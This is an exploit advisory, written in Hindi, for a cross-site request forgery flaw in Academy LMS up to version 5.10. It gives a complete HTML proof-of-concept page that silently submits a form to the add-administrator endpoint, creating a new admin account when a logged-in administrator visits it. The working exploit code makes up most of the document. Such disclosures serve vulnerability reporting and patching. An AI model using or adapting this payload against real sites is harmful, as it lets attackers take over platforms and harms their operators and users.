
Academy LMS <= 5.10 CSRF
Academy LMS <= 5.10 CSRF
Academy LMS एक ऐसा एप्लिकेशन है जहाँ लोग कोर्स बना सकते हैं और उनका विज्ञापन कर सकते हैं। एक नया प्रशासनिक उपयोगकर्ता जोड़ने की क्षमता CSRF के प्रति संवेदनशील है, जिससे सोशल इंजीनियरिंग का उपयोग करके प्लेटफ़ॉर्म पर एडमिन पहुँच प्राप्त करना संभव हो जाता है।
#प्रूफ ऑफ कॉन्सेप्ट (POC) हमारे प्रूफ ऑफ कॉन्सेप्ट में पहला कदम प्लेटफ़ॉर्म पर एक प्रशासनिक उपयोगकर्ता के साथ प्रमाणित करना है।
उसके बाद, बस उस पृष्ठ तक पहुँचें जिसमें भेद्यता का शोषण करने का कोड है, और देखें कि सिस्टम में एक नया प्रशासनिक उपयोगकर्ता जोड़ा गया है।
शोषण में उपयोग किया गया कोड:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://target.com/academy/admin/admins/add" method="POST">
<input type="hidden" name="first_name" value="csrf" />
<input type="hidden" name="last_name" value="vinix" />
<input type="hidden" name="biography" value="<p>csrf poc</p>" />
<input type="hidden" name="files" value="" />
<input type="hidden" name="user_image" value="" />
<input type="hidden" name="email" value="username" />
<input type="hidden" name="password" value="password" />
<input type="hidden" name="facebook_link" value="" />
<input type="hidden" name="twitter_link" value="" />
<input type="hidden" name="linkedin_link" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>